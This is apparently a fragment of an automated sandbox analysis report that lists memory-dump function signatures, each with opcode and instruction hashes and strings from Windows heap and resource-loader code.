                                                • Instruction Fuzzy Hash: 245117723246819FD722DB68CC45F77BBE8FF81B54F050468F6958B291D764E840CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                • API String ID: 2994545307-336120773
                                                • Opcode ID: b880bce3af920c7eb66053ae2e61130d0f348a83a7dfa267c36e4828471a8be6
                                                • Instruction ID: db62b722c0a281965d7b8ff653f0e16b65f67d630626af55b910413cacac9f6d
                                                • Opcode Fuzzy Hash: b880bce3af920c7eb66053ae2e61130d0f348a83a7dfa267c36e4828471a8be6
                                                • Instruction Fuzzy Hash: BF318632210105EFEB20DB6DCAC8F6B73E8EF00B68F154159F505CB240E674E941CB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                • API String ID: 0-1391187441
                                                • Opcode ID: 87677be75e243e4e19c708c400a8e389fa683cc1712f362ed6b09ce19aa3ed16
                                                • Instruction ID: fab486fa9ae4e8a281b4824233110085ee4c2a79345824e43e570906dc7edbf5
                                                • Opcode Fuzzy Hash: 87677be75e243e4e19c708c400a8e389fa683cc1712f362ed6b09ce19aa3ed16
                                                • Instruction Fuzzy Hash: 1B312732A20249AFDB11DB99CC84FABBBF8FF44724F158069F904AB241D774E940CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                • API String ID: 0-4256168463
                                                • Opcode ID: 74bef814a41548ae50fd49a6f0f5ddb9989d97338ef261b91309861c6c0819de
                                                • Instruction ID: 5728360dd0d45d33d0336b2ee8de070a0f0d5c4736cdc648856606d87ef38096
                                                • Opcode Fuzzy Hash: 74bef814a41548ae50fd49a6f0f5ddb9989d97338ef261b91309861c6c0819de
                                                • Instruction Fuzzy Hash: C6014572130205DFCF21EB7DC484BA673E9FF49B28F008459E406DB741DA70E840CA51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 4391d4f8bc4f5a36965c7298ed856d1b4c6a83fe491c51936349867c396b02f8
                                                • Instruction ID: 0be977ae5ef808e4a785f44cbd8100f5f817c8df04ff591fa2d4e551d2851005
                                                • Opcode Fuzzy Hash: 4391d4f8bc4f5a36965c7298ed856d1b4c6a83fe491c51936349867c396b02f8
                                                • Instruction Fuzzy Hash: 1D22FE70A106069FEB24CF29C485B7ABBF5EF44708F28856DE9468B346E774F884CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                • API String ID: 0-1145731471
                                                • Opcode ID: 81761cd6db57a888202651543e36c2415299824390d1f0155d3404f09e766b73
                                                • Instruction ID: 95e6605f46b934e399fa787012171ee44a646ad7a85f735fbaa5b6eeb9ef1887
                                                • Opcode Fuzzy Hash: 81761cd6db57a888202651543e36c2415299824390d1f0155d3404f09e766b73
                                                • Instruction Fuzzy Hash: 98B1E471B202169FDF15CF68D884BACBBB5BF64718F644029EA21EB384D771E850CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 418e8872cc1c4151f093257400954666f7f34208266cffc55e37a823166849b2
                                                • Instruction ID: a1ebdfd3669ab53e9effe640bd9ee4f4b7758c2143fa6c3a185e20551b0a452a
                                                • Opcode Fuzzy Hash: 418e8872cc1c4151f093257400954666f7f34208266cffc55e37a823166849b2
                                                • Instruction Fuzzy Hash: 32A18C319116699BDB31DF28CC88BAAF7B8FF44714F1001EAEA09A7250D735AE84CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0138256F
                                                • HEAP[%wZ]: , xrefs: 0138254F
                                                • HEAP: , xrefs: 0138255C
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                • API String ID: 0-3815128232
                                                • Opcode ID: a8b3e5f2eb11788ebe336c6eef1194a1365b0eb2de166146feb47c1d485a5ebc
                                                • Instruction ID: 9481baad87224ff8f9e1f30482619ed4a341b9c45bb2dfe91a63445d35baf30a
                                                • Opcode Fuzzy Hash: a8b3e5f2eb11788ebe336c6eef1194a1365b0eb2de166146feb47c1d485a5ebc
                                                • Instruction Fuzzy Hash: 405120341103648EE734EF2EC854773BBF9EB48648F15489AE8C28B685D236E846DB30
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • HEAP[%wZ]: , xrefs: 013442A2
                                                • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 013442BA
                                                • HEAP: , xrefs: 013442AF
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                • API String ID: 0-1596344177
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: $$.mui
                                                • API String ID: 0-2138749814
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • LdrResFallbackLangList Exit, xrefs: 012E9A04
                                                • LdrResFallbackLangList Enter, xrefs: 012E99F2
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-1720564570
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 012E61DD
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 012E61CE
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012FB9A5
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 885266447-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: PATH
                                                • API String ID: 0-1036084923
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0134BE0F
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                • API String ID: 0-865735534
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Re-Waiting
                                                • API String ID: 0-316354757
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013040E8
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                • API String ID: 0-996340685
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: WindowsExcludedProcs
                                                • API String ID: 0-3583428290
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08dae2e5c28247f6b40988188bc12583eb41777bffa54ce43f6ddcd553dbecb3
                                                • Instruction ID: aa94ac90818edf67933f2feab136bff9589b3e371ce9a97ea06f29830f9381e1
                                                • Opcode Fuzzy Hash: 08dae2e5c28247f6b40988188bc12583eb41777bffa54ce43f6ddcd553dbecb3
                                                • Instruction Fuzzy Hash: 30E112B1E20608DFCB25CFA9C984AADFBF5FF48314F24452AE646A7261D770A841CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                • Instruction ID: fdbf90387394b10f1e6637cedb068efc3f1499c251772ce6bdb6579823455261
                                                • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                • Instruction Fuzzy Hash: 63B1AD35A2060A9BEB15DBA9C890B7EBBEAEF88204F144179E742D7381D770E941CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a3704bc32d9ddae91d55e9705cbaa55a0b98e8948c232a271ab2c21f57bf620
                                                • Instruction ID: 76ac8478e94ba345c1e699bc93a33d9af48da354e3b3d57d8b71a4a47462486b
                                                • Opcode Fuzzy Hash: 4a3704bc32d9ddae91d55e9705cbaa55a0b98e8948c232a271ab2c21f57bf620
                                                • Instruction Fuzzy Hash: 37C122B55083818FD355CF28C580A5AFBE1BF89308F14496EF9998B392D771E885CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a7eb729121eb0577aff84772ade5c5773151f54809dab0fcf33a120318d7d69
                                                • Instruction ID: 3a08e3822d757d6926435689cf09f82636351eefcdf9261dc55c02d056fc72f0
                                                • Opcode Fuzzy Hash: 3a7eb729121eb0577aff84772ade5c5773151f54809dab0fcf33a120318d7d69
                                                • Instruction Fuzzy Hash: 7A914831E04259AFEB369B6CC854BADBBE8AB0176CF050271FA50B72D1D774AD00CB85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63da6c5321f60b060927219fca6a56cef8f64c0f9e69545597acdde35e4e82dd
                                                • Instruction ID: 3eb6570e0620c074c32d13c87df2f47f72014992ad969ef919bf4955ea00a422
                                                • Opcode Fuzzy Hash: 63da6c5321f60b060927219fca6a56cef8f64c0f9e69545597acdde35e4e82dd
                                                • Instruction Fuzzy Hash: 0FA177B4A046098FDF26CFECC8A57A9BBE5BF0831CF144159D9119B2D6D770E882CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34fd2b9626afae08e9e8856ef7f64059cd9d937e9e815f97ad670e77b300143c
                                                • Instruction ID: 93e0a7b19d481f40c7b14924f2eded00a33d73ae3969b69185aa605b2994d5aa
                                                • Opcode Fuzzy Hash: 34fd2b9626afae08e9e8856ef7f64059cd9d937e9e815f97ad670e77b300143c
                                                • Instruction Fuzzy Hash: FA81BAB1A101199BDB358A1CCD40BEAB7B8EF84318F0445A9DB15E3295E7B4DDC1CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                • Instruction ID: 00b668662756267983f35e9ec1332919c35a4186c3ddb4537ff0e1197bab1d8f
                                                • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                • Instruction Fuzzy Hash: 1F818B71A00346DFCB25CF68C490BAABBF5EF48314F14856AE956D7791D330EA41CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bcb1e80b99a1eea359d56aa01ff11e17088b1afbe5adc19662dcf9eadea38a19
                                                • Instruction ID: 96cd5e19f2072aa569d8e939f0a3f99d3a5054d319ddd1a765c0a3b4425f11fa
                                                • Opcode Fuzzy Hash: bcb1e80b99a1eea359d56aa01ff11e17088b1afbe5adc19662dcf9eadea38a19
                                                • Instruction Fuzzy Hash: 0371BF72104741AFDB15DFA9C884A6BBFE8EF88748F04456DFD499B259D630D808CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4209b8e0251aac88f0d648e786e3cf9cc140504697d59a43498e53ad9a43660
                                                • Instruction ID: 7758694ec04dde8da1f331d044031a3d02817fbf3fd370f2e81c369e6d39b240
                                                • Opcode Fuzzy Hash: d4209b8e0251aac88f0d648e786e3cf9cc140504697d59a43498e53ad9a43660
                                                • Instruction Fuzzy Hash: 4E71EC32340706EFE7369F18C844F6AFBE9EB40728F148528E655DB6A8DB75E940CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c64cf6325cd1c38f601fe2ffb4d79a0aa2d502ca657382b990673b8ff0efa87b
                                                • Instruction ID: 65bf5d5f760afae7afbe9e623780541f316669477ffa030c70757e5e61479b8e
                                                • Opcode Fuzzy Hash: c64cf6325cd1c38f601fe2ffb4d79a0aa2d502ca657382b990673b8ff0efa87b
                                                • Instruction Fuzzy Hash: E0612132A202568FCB25CF5CC5856BABBF1EF85300F9880A9EA49DF345DB34D942C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13e9cb9b12e4a0741ea3741422769b61454c72f688c7b19b0273face1aabe081
                                                • Instruction ID: 7c04afa1ff0e89e6ace3546489f4d4ee92726db3de7e4f7216af84634bfcfc23
                                                • Opcode Fuzzy Hash: 13e9cb9b12e4a0741ea3741422769b61454c72f688c7b19b0273face1aabe081
                                                • Instruction Fuzzy Hash: 58517DB1B207469FDB35DF99C884A7AF7E8FB94319F10482DE14687651C7B4E844CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e013d8ec50cb542f4f9552f3850be8c5916c970545f1dbeb76493231884b772
                                                • Instruction ID: 48ff2c2669a7a4596ce2215f19524f5bb10d6ef005cf8ec24ff3865b4a9a6be7
                                                • Opcode Fuzzy Hash: 6e013d8ec50cb542f4f9552f3850be8c5916c970545f1dbeb76493231884b772
                                                • Instruction Fuzzy Hash: F6510271D0025A8EEF35CF78C844BAEBFB0BF85318F1041ADD859AB282D7754941CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9be41bad0a2a80bbcfd570dccb1e7dc9d72c1f2a0dd843ee5670515507ee4e9b
                                                • Instruction ID: eb5a915d464ae30f7cc3408de028ddb74060715f24ff9bd5ef7ac1434828a6c1
                                                • Opcode Fuzzy Hash: 9be41bad0a2a80bbcfd570dccb1e7dc9d72c1f2a0dd843ee5670515507ee4e9b
                                                • Instruction Fuzzy Hash: EB51FF31215742AFD725DF28C849B27BBE4FFA0718F14091EF99587651E7B0E848CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d9ef27a47936821aa1e36b78755b96d7843a910daf30621252412945d72a762
                                                • Instruction ID: 22058b8f1a8bbc7c3aed60d2beb77cd684094a807023010866a63761e61c18d9
                                                • Opcode Fuzzy Hash: 4d9ef27a47936821aa1e36b78755b96d7843a910daf30621252412945d72a762
                                                • Instruction Fuzzy Hash: BE51F676B00529CFCB16DF1CC4A89BEB7F5FF88704719845AE8469B395D730AA41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7552b917673af5b339b4a4b3f912d72e124ab2afbb2553e06b46208a57cff31b
                                                • Instruction ID: 23b95856c77ce98017aabcf110851aa826d79ee8ff8f3c4f23ed37587d8b089b
                                                • Opcode Fuzzy Hash: 7552b917673af5b339b4a4b3f912d72e124ab2afbb2553e06b46208a57cff31b
                                                • Instruction Fuzzy Hash: FD51D772A00208EBDF15CF58DC40FAEFBB9EF44314F058569E956AB294D7749A04CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73c6a623a15584628b542aab44a4ae1cc2b9004ace00c4112aead85b33a2162a
                                                • Instruction ID: 17fc235e2aabce9e144c2b973a2dcc7598d40eafaab1c97136c323042fdbefb8
                                                • Opcode Fuzzy Hash: 73c6a623a15584628b542aab44a4ae1cc2b9004ace00c4112aead85b33a2162a
                                                • Instruction Fuzzy Hash: 70519D72A1161ADFCB14CFA8C480BAEFBF5BF48314F24816ED655A7384DB71A944CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57c987ef142df1584dd8d639fa8fc84791a5094b44c6db83ae1c023477dd8020
                                                • Instruction ID: c8ebe15aeee206bf20432cb60fd60fc8ba84b527ace769b02f7097bc5d25ff75
                                                • Opcode Fuzzy Hash: 57c987ef142df1584dd8d639fa8fc84791a5094b44c6db83ae1c023477dd8020
                                                • Instruction Fuzzy Hash: E1515B75A00619CFCB19CF98C480AADF7B5FF88718F2485A9D915A7355D730AE41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cbb84ab1c58eafca201b51c552d36d873462b68d6cab0814f3b31ceda1b4a8a5
                                                • Instruction ID: 178208b1d7c478cb7ca538d2c357d4bbae9dee55e2c310dc09f2a420b29fbcc9
                                                • Opcode Fuzzy Hash: cbb84ab1c58eafca201b51c552d36d873462b68d6cab0814f3b31ceda1b4a8a5
                                                • Instruction Fuzzy Hash: 5D517B3190021ADFEF26DF59C894ADFBBB5BF18318F108115E904AB2A0CB359D92CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c2d4c94ee554a9e0f0620c47bc61ab55b9fa604c577c5f4186a55558d86a4aa
                                                • Instruction ID: 1282ec8edff7afaa60d5575a7221728a8ea23a447100ff74511c3217f7a8c4d8
                                                • Opcode Fuzzy Hash: 3c2d4c94ee554a9e0f0620c47bc61ab55b9fa604c577c5f4186a55558d86a4aa
                                                • Instruction Fuzzy Hash: 8E41E436624302AFC724EF28C840B6ABBA4AF94714F10092DF9959B791E7B0DC45CBD9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 347f827434bf9ffa6e7934e0f2222d2cf20cc1399c599990083399d3e826e3d7
                                                • Instruction ID: 11e869ac4a80d146fac9fd9c77a32daf11ff9788539d0965c2a591ec71db5b68
                                                • Opcode Fuzzy Hash: 347f827434bf9ffa6e7934e0f2222d2cf20cc1399c599990083399d3e826e3d7
                                                • Instruction Fuzzy Hash: 29419975A40219ABDF21DF68C941FEE77F8EF45714F0100A9EA08AB241D774EE44CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac52a2ef2d7881e05c5856240c2be9b389c8feff9d7599daf46d31c010cf56e8
                                                • Instruction ID: aa2ee59d6ae2a81546e5382c70d8f1401d17da6d2b90fdd7f667c16fc08f557f
                                                • Opcode Fuzzy Hash: ac52a2ef2d7881e05c5856240c2be9b389c8feff9d7599daf46d31c010cf56e8
                                                • Instruction Fuzzy Hash: 5641F5B1A403189FEB32DF18CC91FA6B7E9EB45718F0000A9EA49972C1D770EE44CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c08390843714bd1a60f9a7707e14dd316fff31ff4caca01f30137b14e0ef5f8
                                                • Instruction ID: 4e8a5fc30b276cc2f9a13ff8c8f32c7712866b881b63a28547ff177c86f2167f
                                                • Opcode Fuzzy Hash: 6c08390843714bd1a60f9a7707e14dd316fff31ff4caca01f30137b14e0ef5f8
